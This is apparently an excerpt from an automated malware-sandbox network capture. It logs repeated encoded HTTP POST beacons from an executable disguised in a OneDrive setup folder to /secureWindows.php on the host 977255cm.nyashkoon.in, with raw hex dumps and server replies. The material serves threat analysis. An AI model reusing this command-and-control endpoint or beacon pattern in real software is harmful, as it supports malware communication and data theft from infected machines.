                                                        Oct 30, 2024 05:23:21.073975086 CET1076OUTData Raw: 57 55 5c 55 55 5a 56 56 58 57 50 59 55 5e 5b 5c 54 58 5c 54 59 51 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WU\UUZVVXWPYU^[\TX\TYQZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&, <(&Y'>#A.4]&>';98]"*$'))5505.: F$,Z*=
                                                        Oct 30, 2024 05:23:21.314237118 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:21.508055925 CET784INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:21 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wfgWhasNf6UzjGRHhhN0CIiau2E%2BljpRv4uolIBO5NSpUFRA2jEBilCLC7aUQIdrqOIgmPc8YiU0gXqOsVyGCmVP3rY0CdPYKarI%2FUvrYVcegeNR5dyMxu2ZviWqUxks4bDW8diNqck%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a125db364769-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1107&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1273526&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        86192.168.2.449950188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:21.641458035 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:21.997354031 CET1076OUTData Raw: 57 54 59 51 55 59 53 55 58 57 50 59 55 59 5b 52 54 5e 5c 5d 59 55 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WTYQUYSUXWPYUY[RT^\]YUZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&;V2^+;1%.$-?&<_;;":8')3_?%:'%X. F$,Z*!
                                                        Oct 30, 2024 05:23:22.244126081 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:22.604337931 CET785INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:22 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5E8d%2B3Gv9g3RIWTf%2BYLyRkpCJ51hsYCxnYWFzoBnzLHhpqFUVkmPJLlyq1ajkp5O57spXONpNTI%2BbTOYZj4lFz2WQMrLJ%2Fm7dzu8lw9PH1elst54%2FwldEe0StT18gQYXyjYCrkNxKvM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a12baa1fead1-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1361&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1109578&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:22.604512930 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        87192.168.2.449959188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:22.774600029 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:23.120866060 CET1076OUTData Raw: 52 54 5c 52 55 5d 53 56 58 57 50 59 55 59 5b 53 54 5e 5c 5b 59 50 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\RU]SVXWPYUY[ST^\[YPZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;02Y+;.Y3>;D90$--9(X#: 1_#^(%6$69: F$,Z*!
                                                        Oct 30, 2024 05:23:23.369278908 CET25INHTTP/1.1 100 Continue


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        88192.168.2.449963188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:23.487828016 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:23.839660883 CET1340OUTData Raw: 57 5e 5c 53 50 5f 56 54 58 57 50 59 55 50 5b 5d 54 59 5c 5b 59 5c 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W^\SP_VTXWPYUP[]TY\[Y\ZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%, :]<[3#-C,$=0[/:$#: 1(<%^38%-: F$,Z*
                                                        Oct 30, 2024 05:23:24.094664097 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:24.408994913 CET940INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=niKDgvD%2F%2B%2FpnW0AJV3eqcwpG2e0dsyTh%2BjaCSrjGLKDP7ZFS76Smcr3VjHUoSKd%2BtliAb0WwS3ErG%2BzLIEQTn3jgkPctBz8aKw6uzfdDmgpSXw2o3fRqtvr6cy3foFIFZqedDBXMQY8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a137388e46ce-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1542&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=938431&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 1d 3c 01 23 08 31 23 04 13 3c 2c 26 00 29 3d 3a 14 30 31 24 5e 26 12 39 00 28 28 37 10 2a 34 2c 5a 3f 0b 3b 00 34 26 0e 5b 3e 3b 2f 46 0c 10 27 5f 24 54 33 56 28 0d 3d 5c 29 28 3b 17 34 30 25 01 3d 00 2b 51 20 23 2b 01 33 0f 35 0d 2c 03 22 52 3a 35 32 12 2d 30 30 53 3e 3a 21 57 08 14 22 1f 24 3f 3c 05 32 3d 2f 04 25 54 22 13 34 01 0d 1f 36 38 2e 58 2b 05 28 56 32 20 2b 06 30 30 28 0f 26 29 27 07 2b 32 3c 0d 27 23 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&<#1#<,&)=:01$^&9((7*4,Z?;4&[>;/F'_$T3V(=\)(;40%=+Q #+35,"R:52-00S>:!W"$?<2=/%T"468.X+(V2 +00(&)'+2<'#"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        89192.168.2.449965188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:23.608897924 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:23.964682102 CET1076OUTData Raw: 52 50 5c 55 55 54 56 5d 58 57 50 59 55 51 5b 53 54 59 5c 5f 59 56 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RP\UUTV]XWPYUQ[STY\_YVZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%;&+:[''.5Z&[#-* *+\%X(5&3!_9 F$,Z*
                                                        Oct 30, 2024 05:23:24.228070974 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:24.421516895 CET778INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:24 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qEqyUBV%2Bre7Ui5iWZoJDz9g8lQeNm%2FcezfkkOc8jVtIvK7RA32VLCGKAxc4ibkt5hcEtCyUKVRLoP8Lxmoph8uLYtVu5lqLKgeefqE6pLjv1OPFTO0E2oTjESrV90PgzpgDw6PNm4RI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1381c682e24-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2130&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=681091&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:24.421561003 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        90192.168.2.449970188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:24.546519995 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:24.902158022 CET1076OUTData Raw: 52 53 5c 57 55 5f 56 5c 58 57 50 59 55 5a 5b 5e 54 5d 5c 5f 59 5c 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RS\WU_V\XWPYUZ[^T]\_Y\Z\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z;0-?+.Z'.;-C4_1.3/*8\#&_?X+>08--* F$,Z*-
                                                        Oct 30, 2024 05:23:25.142275095 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:25.343456984 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:25 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ORsgEKu8BAQc6KznRTB0Vy%2B0YbOG9xYt6%2BYV%2FZEro81%2BqFiEJqlrDtv3bkaSk6eMRjOyZz3G50AF4ceVFHXxBorbhH3MkUFwdrjvjMTtshkVWd7UBOmCqVB7ikWnkmPABfzJkWPgvUQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a13dcfa86c74-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1233&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1213746&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        91192.168.2.449976188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:25.486816883 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:25.839690924 CET1076OUTData Raw: 57 54 5c 53 50 5d 56 57 58 57 50 59 55 5c 5b 5d 54 5a 5c 5c 59 50 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WT\SP]VWXWPYU\[]TZ\\YPZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%8<"0-;:/&.<8*Z797&)4<9Z'5Y/: F$,Z*5
                                                        Oct 30, 2024 05:23:26.091653109 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:26.285461903 CET787INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:26 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hui3hlBO3E7mWFQXxN4pmvz7LX50eX4j5Cwu2snjPQ7Exig4fTcq5%2FuZ6zIOa154WDi51UXW49Gy69KRe%2BrL2lg%2BmxBun6QSopKjiCPILtmcxwf0j027YXs%2Fv1m6Bf2tV0qAYxzbyZI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a143be6fe983-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2062&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=701890&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        92192.168.2.449983188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:26.405018091 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:26.761555910 CET1076OUTData Raw: 57 56 59 57 55 5d 53 51 58 57 50 59 55 5a 5b 5e 54 5f 5c 58 59 51 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WVYWU]SQXWPYUZ[^T_\XYQZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%^;*Y?07E954_%-8)7##[%]?%'^5[- F$,Z*-
                                                        Oct 30, 2024 05:23:27.002424002 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:27.328603029 CET789INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:27 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MolGBu%2FTTWSoPGWx4Q1WiRMVR0ngkQ7zN0KFjtpa5PnQ7q0HWBLcxXbpHBIwmfADMuRIcIqFaMQCZh9vIj6YWesXHX6e1sAv0V1xak89%2F%2Fwk6hrae7k5%2B4ZFHw2beTDzvmRxk%2FIbTRo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1496a9b2cab-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2154&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=671614&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        93192.168.2.449990188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:27.461026907 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:27.808382988 CET1076OUTData Raw: 57 53 5c 56 55 5d 53 50 58 57 50 59 55 50 5b 5c 54 5f 5c 5b 59 52 5a 55 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\VU]SPXWPYUP[\T_\[YRZU]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%/>=813 96<Z% ,(]#*X%3(C9]'(=Z. F$,Z*
                                                        Oct 30, 2024 05:23:28.067584038 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:28.265152931 CET782INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eaGlRRNEUwLatk5sQxJefLxf6Nm8E5g9NlYzFPlp8d4kLb2WRqnTtnAjsficVQjSfYnvewZ2QeBmG7JdPG9zZM4wFWLzsjUNeO9qy1iFWjcCdP9YaNyl1CJa9eBie99QTZ%2BtXcqPQ5M%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a1500ed54871-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1177&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1221940&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        94192.168.2.449996188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:28.391906977 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:28.745898008 CET1076OUTData Raw: 57 50 59 51 55 58 56 53 58 57 50 59 55 5b 5b 59 54 5a 5c 5d 59 56 5a 58 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WPYQUXVSXWPYU[[YTZ\]YVZX]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[-3&(0>#-5<$-;;/#*;Y24?%]3*9 F$,Z*)
                                                        Oct 30, 2024 05:23:29.012952089 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:29.218380928 CET794INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:29 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MwgRFYoa%2BuTVhAEvUSFTzHc6Q%2Bt4gGKIXGeiUQSCQGMid%2FN1XCc7lx%2BX5G8WTEJzWx10Xzall9v%2FkdApLRdJATx1bIz6V8D6ex39xuN8REygY%2FMlQyTT%2Fl0F3s1qnXltVk2ZNIuieWI%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a155fd696b3b-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1255&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1088721&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        95192.168.2.450002188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:29.342559099 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        96192.168.2.450003188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
